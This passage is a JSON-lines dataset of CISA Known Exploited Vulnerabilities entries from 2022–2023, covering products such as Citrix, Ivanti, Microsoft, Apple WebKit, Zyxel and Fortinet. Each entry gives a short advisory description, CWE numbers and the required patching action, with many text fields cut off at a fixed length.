Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-26359", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-24489", "text": "Citrix Content Collaboration ShareFile Improper Access Control Vulnerability\n\nAffected: Citrix Content Collaboration\n\nCitrix Content Collaboration contains an improper access control vulnerability that could allow an unauthenticated attacker to remotely compromise customer-managed ShareFile storage zones controllers.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnera", "cve_id": "CVE-2023-24489", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-38180", "text": "Microsoft .NET Core and Visual Studio Denial-of-Service Vulnerability\n\nAffected: Microsoft .NET Core and Visual Studio\n\nMicrosoft .NET Core and Visual Studio contain an unspecified vulnerability that allows for denial-of-service (DoS).\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-38180", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-35081", "text": "Ivanti Endpoint Manager Mobile (EPMM) Path Traversal Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains a path traversal vulnerability that enables an authenticated administrator to perform malicious file writes to the EPMM server. This vulnerability can be used in conjunction with CVE-2023-35078 to bypass authentication and ACLs restrictions (if applicable).\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use", "cve_id": "CVE-2023-35081", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-37580", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability impacting the confidentiality and integrity of data.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-37580", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-38606", "text": "Apple Multiple Products Kernel Unspecified Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and watchOS contain an unspecified vulnerability allowing an app to modify a sensitive kernel state.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-38606", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-35078", "text": "Ivanti Endpoint Manager Mobile Authentication Bypass Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM, previously branded MobileIron Core) contains an authentication bypass vulnerability that allows unauthenticated access to specific API paths. An attacker with access to these API paths can access personally identifiable information (PII) such as names, phone numbers, and other mobile device details for users on a vulnerable system. An attacker", "cve_id": "CVE-2023-35078", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29298", "text": "Adobe ColdFusion Improper Access Control Vulnerability\n\nAffected: Adobe ColdFusion\n\nAdobe ColdFusion contains an improper access control vulnerability that allows for a security feature bypass.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-29298", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-3519", "text": "Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability\n\nAffected: Citrix NetScaler ADC and NetScaler Gateway\n\nCitrix NetScaler ADC and NetScaler Gateway contains a code injection vulnerability that allows for unauthenticated remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-3519", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36884", "text": "Microsoft Windows Search Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Search contains an unspecified vulnerability that could allow an attacker to evade Mark of the Web (MOTW) defenses via a specially crafted malicious file, leading to remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-362\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2023-36884", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-29303", "text": "SolarView Compact Command Injection Vulnerability\n\nAffected: SolarView Compact\n\nSolarView Compact contains a command injection vulnerability due to improper validation of input values on the send test mail console of the product's web server.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-29303", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-37450", "text": "Apple Multiple Products WebKit Code Execution Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain an unspecified vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions or discontinue use o", "cve_id": "CVE-2023-37450", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32046", "text": "Microsoft Windows MSHTML Platform Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows MSHTML Platform contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-32046", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32049", "text": "Microsoft Windows Defender SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Defender SmartScreen contains a security feature bypass vulnerability that allows an attacker to bypass the Open File - Security Warning prompt.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-32049", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-35311", "text": "Microsoft Outlook Security Feature Bypass Vulnerability\n\nAffected: Microsoft Outlook\n\nMicrosoft Outlook contains a security feature bypass vulnerability that allows an attacker to bypass the Microsoft Outlook Security Notice prompt.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nCWE(s): CWE-367\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-35311", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-36874", "text": "Microsoft Windows Error Reporting Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Error Reporting Service contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nCWE(s): CWE-59\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-36874", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-31199", "text": "Netwrix Auditor Insecure Object Deserialization Vulnerability\n\nAffected: Netwrix Auditor\n\nNetwrix Auditor User Activity Video Recording component contains an insecure objection deserialization vulnerability that allows an unauthenticated, remote attacker to execute code as the NT AUTHORITY\\SYSTEM user. Successful exploitation requires that the attacker is able to reach port 9004/TCP, which is commonly blocked by standard enterprise firewalling.\n\nRequired Action: Apply updates per vendor instruct", "cve_id": "CVE-2022-31199", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32434", "text": "Apple Multiple Products Integer Overflow Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS. iPadOS, macOS, and watchOS contain an integer overflow vulnerability that could allow an application to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-32434", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32435", "text": "Apple Multiple Products WebKit Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain a memory corruption vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CW", "cve_id": "CVE-2023-32435", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32439", "text": "Apple Multiple Products WebKit Type Confusion Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain a type confusion vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-843\n", "cve_id": "CVE-2023-32439", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20867", "text": "VMware Tools Authentication Bypass Vulnerability\n\nAffected: VMware Tools\n\nVMware Tools contains an authentication bypass vulnerability in the vgauth module. A fully compromised ESXi host can force VMware Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine. An attacker must have root access over ESXi to exploit this vulnerability.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-287\n\n[Source: CISA Kn", "cve_id": "CVE-2023-20867", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-27992", "text": "Zyxel Multiple NAS Devices Command Injection Vulnerability\n\nAffected: Zyxel Multiple Network-Attached Storage (NAS) Devices\n\nMultiple Zyxel network-attached storage (NAS) devices contain a pre-authentication command injection vulnerability that could allow an unauthenticated attacker to execute commands remotely via a crafted HTTP request.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-27992", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20887", "text": "Vmware Aria Operations for Networks Command Injection Vulnerability\n\nAffected: VMware Aria Operations for Networks\n\nVMware Aria Operations for Networks (formerly vRealize Network Insight) contains a command injection vulnerability that allows a malicious actor with network access to perform an attack resulting in remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-20887", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-27997", "text": "Fortinet FortiOS and FortiProxy SSL-VPN Heap-Based Buffer Overflow Vulnerability\n\nAffected: Fortinet FortiOS and FortiProxy SSL-VPN\n\nFortinet FortiOS and FortiProxy SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute code or commands via specifically crafted requests.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-27997", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-3079", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains a type confusion vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2023-3079", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33009", "text": "Zyxel Multiple Firewalls Buffer Overflow Vulnerability\n\nAffected: Zyxel Multiple Firewalls\n\nZyxel ATP, USG FLEX, USG FLEX 50(W), USG20(W)-VPN, VPN, and ZyWALL/USG firewalls contain a buffer overflow vulnerability in the notification function that could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and remote code execution on an affected device.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-120\n\n[Source: CISA Known Exploited Vulnerabilities", "cve_id": "CVE-2023-33009", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-33010", "text": "Zyxel Multiple Firewalls Buffer Overflow Vulnerability\n\nAffected: Zyxel Multiple Firewalls\n\nZyxel ATP, USG FLEX, USG FLEX 50(W), USG20(W)-VPN, VPN, and ZyWALL/USG firewalls contain a buffer overflow vulnerability in the ID processing function that could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and remote code execution on an affected device.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-120\n\n[Source: CISA Known Exploited Vulnerabilitie", "cve_id": "CVE-2023-33010", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-34362", "text": "Progress MOVEit Transfer SQL Injection Vulnerability\n\nAffected: Progress MOVEit Transfer\n\nProgress MOVEit Transfer contains a SQL injection vulnerability that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or delet", "cve_id": "CVE-2023-34362", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28771", "text": "Zyxel Multiple Firewalls OS Command Injection Vulnerability\n\nAffected: Zyxel Multiple Firewalls\n\nZyxel ATP, USG FLEX, VPN, and ZyWALL/USG firewalls allow for improper error message handling which could allow an unauthenticated attacker to execute OS commands remotely by sending crafted packets to an affected device.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-28771", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-2868", "text": "Barracuda Networks ESG Appliance Improper Input Validation Vulnerability\n\nAffected: Barracuda Networks Email Security Gateway (ESG) Appliance\n\nBarracuda Email Security Gateway (ESG) appliance contains an improper input validation vulnerability of a user-supplied .tar file, leading to remote command injection.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-2868", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32409", "text": "Apple Multiple Products WebKit Sandbox Escape Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and Safari WebKit contain an unspecified vulnerability that can allow a remote attacker to break out of the Web Content sandbox. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source", "cve_id": "CVE-2023-32409", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28204", "text": "Apple Multiple Products WebKit Out-of-Bounds Read Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and Safari WebKit contain an out-of-bounds read vulnerability that may disclose sensitive information when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per ven", "cve_id": "CVE-2023-28204", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-32373", "text": "Apple Multiple Products WebKit Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and Safari WebKit contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nC", "cve_id": "CVE-2023-32373", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21492", "text": "Samsung Mobile Devices Insertion of Sensitive Information Into Log File Vulnerability\n\nAffected: Samsung Mobile Devices\n\nSamsung mobile devices running Android 11, 12, and 13 contain an insertion of sensitive information into log file vulnerability that allows a privileged, local attacker to conduct an address space layout randomization (ASLR) bypass.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-532\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21492", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-25717", "text": "Multiple Ruckus Wireless Products CSRF and RCE Vulnerability\n\nAffected: Ruckus Wireless Multiple Products\n\nRuckus Wireless Access Point (AP) software contains an unspecified vulnerability in the web services component. If the web services component is enabled on the AP, an attacker can perform cross-site request forgery (CSRF) or remote code execution (RCE). This vulnerability impacts Ruckus ZoneDirector, SmartZone, and Solo APs.\n\nRequired Action: Apply updates per vendor instructions or disconn", "cve_id": "CVE-2023-25717", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29336", "text": "Microsoft Win32K Privilege Escalation Vulnerability\n\nAffected: Microsoft Win32k\n\nMicrosoft Win32k contains an unspecified vulnerability that allows for privilege escalation up to SYSTEM privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-29336", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-1389", "text": "TP-Link Archer AX-21 Command Injection Vulnerability\n\nAffected: TP-Link Archer AX21\n\nTP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-1389", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21839", "text": "Oracle WebLogic Server Unspecified Vulnerability\n\nAffected: Oracle WebLogic Server\n\nOracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21839", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28432", "text": "MinIO Information Disclosure Vulnerability\n\nAffected: MinIO MinIO\n\nMinIO contains a vulnerability in a cluster deployment where MinIO returns all environment variables, which allows for information disclosure.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-200\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-28432", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-27350", "text": "PaperCut MF/NG Improper Access Control Vulnerability\n\nAffected: PaperCut MF/NG\n\nPaperCut MF/NG contains an improper access control vulnerability within the SetupCompleted class that allows authentication bypass and code execution in the context of system.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-27350", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-2136", "text": "Google Chrome Skia Integer Overflow Vulnerability\n\nAffected: Google Chromium Skia\n\nGoogle Chromium Skia contains an integer overflow vulnerability that allows a remote attacker, who has compromised the renderer process, to potentially perform a sandbox escape via a crafted HTML page. This vulnerability affects Google Chrome and ChromeOS, Android, Flutter, and possibly other products.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerab", "cve_id": "CVE-2023-2136", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-20963", "text": "Android Framework Privilege Escalation Vulnerability\n\nAffected: Android Framework\n\nAndroid Framework contains an unspecified vulnerability that allows for privilege escalation after updating an app to a higher Target SDK with no additional execution privileges needed.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-295\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-20963", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-29492", "text": "Novi Survey Insecure Deserialization Vulnerability\n\nAffected: Novi Survey Novi Survey\n\nNovi Survey contains an insecure deserialization vulnerability that allows remote attackers to execute code on the server in the context of the service account.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-29492", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28252", "text": "Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) driver contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-28252", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28205", "text": "Apple Multiple Products WebKit Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and Safari WebKit contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n", "cve_id": "CVE-2023-28205", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-28206", "text": "Apple iOS, iPadOS, and macOS IOSurfaceAccelerator Out-of-Bounds Write Vulnerability\n\nAffected: Apple iOS, iPadOS, and macOS\n\nApple iOS, iPadOS, and macOS IOSurfaceAccelerator contain an out-of-bounds write vulnerability that allows an app to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-28206", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-26083", "text": "Arm Mali GPU Kernel Driver Information Disclosure Vulnerability\n\nAffected: Arm Mali Graphics Processing Unit (GPU)\n\nArm Mali GPU Kernel Driver contains an information disclosure vulnerability that allows a non-privileged user to make valid GPU processing operations that expose sensitive kernel metadata.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-401\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-26083", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-27926", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability by allowing an endpoint URL to accept parameters without sanitizing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-79, CWE-138\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-27926", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-42948", "text": "Fortra Cobalt Strike User Interface Remote Code Execution Vulnerability\n\nAffected: Fortra Cobalt Strike\n\nFortra Cobalt Strike User Interface contains an unspecified vulnerability rooted in Java Swing that may allow remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-79, CWE-116\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-42948", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-39197", "text": "Fortra Cobalt Strike Teamserver Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Fortra Cobalt Strike\n\nFortra Cobalt Strike contains a cross-site scripting (XSS) vulnerability in Teamserver that would allow an attacker to set a malformed username in the Beacon configuration, allowing them to execute code remotely.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-39197", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-38181", "text": "Arm Mali GPU Kernel Driver Use-After-Free Vulnerability\n\nAffected: Arm Mali Graphics Processing Unit (GPU)\n\nArm Mali GPU Kernel Driver contains a use-after-free vulnerability that may allow a non-privileged user to gain root privilege and/or disclose information.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-38181", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-0266", "text": "Linux Kernel Use-After-Free Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains a use-after-free vulnerability that allows for privilege escalation to gain ring0 access from the system user.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-0266", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-3038", "text": "Google Chromium Network Service Use-After-Free Vulnerability\n\nAffected: Google Chromium Network Service\n\nGoogle Chromium Network Service contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Sou", "cve_id": "CVE-2022-3038", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22706", "text": "Arm Mali GPU Kernel Driver Unspecified Vulnerability\n\nAffected: Arm Mali Graphics Processing Unit (GPU)\n\nArm Mali GPU Kernel Driver contains an unspecified vulnerability that allows a non-privileged user to achieve write access to read-only memory pages.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22706", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-26360", "text": "Adobe ColdFusion Deserialization of Untrusted Data Vulnerability\n\nAffected: Adobe ColdFusion\n\nAdobe ColdFusion contains a deserialization of untrusted data vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-26360", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-23397", "text": "Microsoft Office Outlook Privilege Escalation Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-294\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-23397", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-24880", "text": "Microsoft Windows SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SmartScreen contains a security feature bypass vulnerability that could allow an attacker to evade Mark of the Web (MOTW) defenses via a specially crafted malicious file.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-863\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-24880", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41328", "text": "Fortinet FortiOS Path Traversal Vulnerability\n\nAffected: Fortinet FortiOS\n\nFortinet FortiOS contains a path traversal vulnerability that may allow a local privileged attacker to read and write files via crafted CLI commands.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41328", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-28810", "text": "Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability\n\nAffected: Zoho ManageEngine\n\nZoho ManageEngine ADSelfService Plus contains an unspecified vulnerability allowing for remote code execution when performing a password change or reset.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78, CWE-259\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-28810", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-33891", "text": "Apache Spark Command Injection Vulnerability\n\nAffected: Apache Spark\n\nApache Spark contains a command injection vulnerability via Spark User Interface (UI) when Access Control Lists (ACLs) are enabled.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-33891", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-35914", "text": "Teclib GLPI Remote Code Execution Vulnerability\n\nAffected: Teclib GLPI\n\nTeclib GLPI contains a remote code execution vulnerability in the third-party library, htmlawed.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-35914", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-36537", "text": "ZK Framework AuUploader Unspecified Vulnerability\n\nAffected: ZK Framework AuUploader\n\nZK Framework AuUploader servlets contain an unspecified vulnerability that could allow an attacker to retrieve the content of a file located in the web context. The ZK Framework is an open-source Java framework. This vulnerability can impact multiple products, including but not limited to ConnectWise R1Soft Server Backup Manager.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s", "cve_id": "CVE-2022-36537", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-47986", "text": "IBM Aspera Faspex Code Execution Vulnerability\n\nAffected: IBM Aspera Faspex\n\nIBM Aspera Faspex could allow a remote attacker to 